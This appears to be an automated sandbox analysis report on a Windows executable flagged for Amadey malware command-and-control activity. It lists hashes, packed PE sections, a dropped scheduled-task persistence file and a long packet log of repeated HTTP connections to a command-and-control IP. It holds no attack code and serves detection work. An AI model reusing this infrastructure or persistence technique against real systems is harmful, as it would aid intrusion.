                    C:\Windows\Tasks\axplong.job

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):292
                    Entropy (8bit):3.4695747129185786
                    Encrypted:false
                    SSDEEP:6:JBWQnXAL1UEZ+lX1lOJUPelkDdtkHs+Zgty0lb+Et0:JQQXABQ1lOmeeDOZgtVyEt0
                    MD5:58E5EBC56FC96DC61E4B39B00F562695
                    SHA1:9F3BF527A4889686488B639E5C8F7678DE84CAEF
                    SHA-256:E4F4F72DA831034405F28718317FEB856DEB5904221A11701844FC35DB67EB74
                    SHA-512:27B44F3BAB591C98D68025CEB1B7A2EA3F16F826C092544A0AA23C5DACE0EBE0E33A02B16ED2F9E4295C946B97F2AA05BF66CF21AF6006EABE5ABF6DD4442DD4
                    Malicious:false
                    Reputation:low
                    Preview:.......<.]I.H.....BF.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........H.U.B.E.R.T.-.P.C.\.h.u.b.e.r.t...................0.................+.@3P.........................

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.950054398309737
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'874'944 bytes
                    MD5:b6041e0fe108db5e8addcf6d6b4da4bf
                    SHA1:4f6d688e4294362965c5e74999cd6f4c24566956
                    SHA256:e5db33a91b7e4fd54196dad1042df50860dc815fdd1fb88a5e093ea2597cb196
                    SHA512:7f64d463e9540a3625b5e68b4afdf4237b0241c144c5fb047d86bfb8491a51f68c34c57566d09b67013b10325a5da0b04664a30539d125ce6b85438846fa1b95
                    SSDEEP:49152:YjBUKhKl0VrRLsa7d/yVaFHd25wLSEC3ymriMz:Yj/KlYRQa7dyVuw5wLSE6ymriM
                    TLSH:8B953321B49F90EED806B0BA6497C82E39724B5EC95D17C489547CB8DBCA13B1C7F622
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

                    File Icon

                    Icon Hash:00928e8e8686b000

                    Static PE Info

                    General

                    Entrypoint:0x8a9000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                    Entrypoint Preview

                    Instruction
                    jmp 00007F43A4E3F0EAh

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4a6f080x10xtqiedmi
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x4a6eb80x18xtqiedmi
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x680000x2de00bd2057c151075458c7aedb704fc468dfFalse0.997253916893733data7.98054945395771IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x690000x1e00x20091f21286d071da60dd102a503e19a88bFalse0.576171875data4.523325782322513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x6b0000x2a40000x200ab1aa15112a11f3215656af86fbf8d94unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    xtqiedmi0x30f0000x1990000x198200eba1114542d968ae0b16998934f10253False0.9943757178407351data7.9531674604718186IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    pzupkaig0x4a80000x10000x400feff11feb3d4497e7db4408f02ede44bFalse0.7890625data6.245089353943212IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x4a90000x30000x220042b1e9da512124e19536ffb83a6b0b77False0.06387867647058823DOS executable (COM)0.7244750831980244IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_MANIFEST0x4a6f180x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                    Imports

                    DLLImport
                    kernel32.dlllstrcpy

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-09-27T01:43:10.768696+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.849716185.215.113.1680TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Sep 27, 2024 01:43:03.604480028 CEST4971080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:03.609896898 CEST8049710185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:03.610018015 CEST4971080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:03.610220909 CEST4971080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:03.614973068 CEST8049710185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:04.327598095 CEST8049710185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:04.331409931 CEST4971080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:04.384794950 CEST4971080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:04.389770985 CEST8049710185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:04.615184069 CEST8049710185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:04.616369963 CEST4971080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:04.732690096 CEST4971080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:04.733308077 CEST4971180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:04.737811089 CEST8049710185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:04.737921000 CEST4971080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:04.738076925 CEST8049711185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:04.738141060 CEST4971180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:04.787873030 CEST4971180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:04.792767048 CEST8049711185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:05.448733091 CEST8049711185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:05.448801994 CEST4971180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:05.449692011 CEST4971180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:05.455274105 CEST8049711185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:05.676136971 CEST8049711185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:05.676294088 CEST4971180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:05.780164003 CEST4971180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:05.780560017 CEST4971280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:05.785216093 CEST8049711185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:05.785316944 CEST4971180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:05.785386086 CEST8049712185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:05.785552025 CEST4971280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:05.791894913 CEST4971280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:05.796637058 CEST8049712185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:06.483901024 CEST8049712185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:06.484034061 CEST4971280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:06.488574982 CEST4971280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:06.493374109 CEST8049712185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:06.712541103 CEST8049712185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:06.712634087 CEST4971280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:06.826920033 CEST4971280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:06.831135035 CEST4971380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:06.832075119 CEST8049712185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:06.832130909 CEST4971280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:06.835999012 CEST8049713185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:06.836090088 CEST4971380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:06.840336084 CEST4971380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:06.845113993 CEST8049713185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:07.559001923 CEST8049713185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:07.559137106 CEST4971380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:07.605623960 CEST4971380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:07.610347986 CEST8049713185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:07.837276936 CEST8049713185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:07.837430000 CEST4971380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:07.967679024 CEST4971380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:07.972862005 CEST8049713185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:07.972956896 CEST4971380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:07.975943089 CEST4971480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:07.980791092 CEST8049714185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:07.980897903 CEST4971480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:07.981076002 CEST4971480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:07.987134933 CEST8049714185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:08.669446945 CEST8049714185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:08.669625044 CEST4971480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:08.670816898 CEST4971480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:08.676003933 CEST8049714185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:08.902663946 CEST8049714185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:08.902800083 CEST4971480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:09.014436007 CEST4971480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:09.015343904 CEST4971580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:09.019659042 CEST8049714185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:09.019764900 CEST4971480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:09.020323038 CEST8049715185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:09.020430088 CEST4971580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:09.020642996 CEST4971580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:09.025588036 CEST8049715185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:09.714042902 CEST8049715185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:09.714301109 CEST4971580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:09.715029955 CEST4971580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:09.719818115 CEST8049715185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:09.937987089 CEST8049715185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:09.938136101 CEST4971580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:10.063633919 CEST4971580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:10.064150095 CEST4971680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:10.068747997 CEST8049715185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:10.068835974 CEST4971580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:10.069001913 CEST8049716185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:10.069077015 CEST4971680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:10.069989920 CEST4971680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:10.074739933 CEST8049716185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:10.768558979 CEST8049716185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:10.768696070 CEST4971680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:10.930135965 CEST4971680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:10.935462952 CEST8049716185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:11.157706022 CEST8049716185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:11.157779932 CEST4971680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:11.264480114 CEST4971680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:11.264899969 CEST4971780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:11.271003008 CEST8049717185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:11.271104097 CEST4971780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:11.271275997 CEST8049716185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:11.271292925 CEST4971780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:11.271358013 CEST4971680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:11.277594090 CEST8049717185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:12.006911993 CEST8049717185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:12.007072926 CEST4971780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:12.007801056 CEST4971780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:12.012598991 CEST8049717185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:12.238358021 CEST8049717185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:12.238482952 CEST4971780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:12.344225883 CEST4971780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:12.344542980 CEST4971880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:12.349348068 CEST8049717185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:12.349364042 CEST8049718185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:12.349455118 CEST4971780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:12.349662066 CEST4971880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:12.349724054 CEST4971880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:12.354512930 CEST8049718185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:13.067775011 CEST8049718185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:13.067933083 CEST4971880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:13.082161903 CEST4971880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:13.087011099 CEST8049718185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:13.312272072 CEST8049718185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:13.312411070 CEST4971880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:13.441724062 CEST4971880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:13.447016954 CEST8049718185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:13.447083950 CEST4971880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:13.458125114 CEST4971980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:13.462971926 CEST8049719185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:13.463061094 CEST4971980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:13.466136932 CEST4971980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:13.470958948 CEST8049719185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:14.162620068 CEST8049719185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:14.162722111 CEST4971980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:14.163535118 CEST4971980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:14.168313026 CEST8049719185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:14.390566111 CEST8049719185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:14.390677929 CEST4971980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:14.498879910 CEST4971980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:14.499236107 CEST4972080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:14.504013062 CEST8049719185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:14.504036903 CEST8049720185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:14.504060984 CEST4971980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:14.504137039 CEST4972080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:14.504458904 CEST4972080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:14.509196043 CEST8049720185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:15.239973068 CEST8049720185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:15.240166903 CEST4972080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:15.241703987 CEST4972080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:15.246524096 CEST8049720185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:15.476587057 CEST8049720185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:15.476728916 CEST4972080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:15.592402935 CEST4972080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:15.593287945 CEST4972180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:15.597599983 CEST8049720185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:15.597702026 CEST4972080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:15.598126888 CEST8049721185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:15.598205090 CEST4972180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:15.598439932 CEST4972180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:15.603240013 CEST8049721185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:16.330008030 CEST8049721185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:16.331159115 CEST4972180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:16.386358023 CEST4972180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:16.391211033 CEST8049721185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:16.618587971 CEST8049721185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:16.618642092 CEST4972180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:16.735135078 CEST4972180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:16.735419989 CEST4972280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:16.740266085 CEST8049722185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:16.740284920 CEST8049721185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:16.742372036 CEST4972180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:16.742372036 CEST4972280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:16.825735092 CEST4972280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:16.831176996 CEST8049722185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:17.445417881 CEST8049722185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:17.445542097 CEST4972280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:17.446409941 CEST4972280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:17.451174974 CEST8049722185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:17.677828074 CEST8049722185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:17.678087950 CEST4972280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:17.780210972 CEST4972280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:17.781096935 CEST4972380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:17.785325050 CEST8049722185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:17.785480976 CEST4972280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:17.785959959 CEST8049723185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:17.786086082 CEST4972380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:17.786559105 CEST4972380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:17.791333914 CEST8049723185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:18.485981941 CEST8049723185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:18.486186981 CEST4972380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:18.486979008 CEST4972380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:18.491718054 CEST8049723185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:18.714329004 CEST8049723185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:18.714447021 CEST4972380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:18.827349901 CEST4972380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:18.827862024 CEST4972480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:18.832447052 CEST8049723185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:18.832636118 CEST4972380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:18.832670927 CEST8049724185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:18.832823992 CEST4972480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:18.833049059 CEST4972480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:18.838282108 CEST8049724185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:19.555145025 CEST8049724185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:19.555217028 CEST4972480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:19.557147980 CEST4972480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:19.561986923 CEST8049724185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:19.789901018 CEST8049724185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:19.790039062 CEST4972480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:19.959554911 CEST4972480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:19.960078955 CEST4972580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:19.964808941 CEST8049724185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:19.964884043 CEST4972480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:19.964958906 CEST8049725185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:19.965035915 CEST4972580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:19.965173006 CEST4972580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:19.971227884 CEST8049725185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:20.678016901 CEST8049725185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:20.678160906 CEST4972580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:20.678956985 CEST4972580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:20.683804035 CEST8049725185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:20.901180983 CEST8049725185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:20.901288033 CEST4972580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:21.019100904 CEST4972580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:21.019428968 CEST4972680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:21.024871111 CEST8049725185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:21.024987936 CEST4972580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:21.025305033 CEST8049726185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:21.025398016 CEST4972680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:21.025661945 CEST4972680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:21.030915022 CEST8049726185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:21.744201899 CEST8049726185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:21.744534016 CEST4972680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:21.745699883 CEST4972680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:21.750474930 CEST8049726185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:21.972769976 CEST8049726185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:21.973031998 CEST4972680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:22.086075068 CEST4972680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:22.089215040 CEST4972780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:22.091519117 CEST8049726185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:22.091587067 CEST4972680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:22.094127893 CEST8049727185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:22.094202995 CEST4972780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:22.094440937 CEST4972780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:22.099278927 CEST8049727185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:22.805089951 CEST8049727185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:22.805213928 CEST4972780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:22.881247044 CEST4972780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:22.886169910 CEST8049727185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:23.116976023 CEST8049727185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:23.117193937 CEST4972780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:23.233048916 CEST4972780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:23.233453989 CEST4972880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:23.238301992 CEST8049727185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:23.238322020 CEST8049728185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:23.238426924 CEST4972780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:23.238459110 CEST4972880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:23.238768101 CEST4972880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:23.243537903 CEST8049728185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:23.948216915 CEST8049728185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:23.948803902 CEST4972880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:23.950522900 CEST4972880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:23.955423117 CEST8049728185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:24.180466890 CEST8049728185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:24.180537939 CEST4972880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:24.296119928 CEST4972880192.168.2.8185.215.113.16
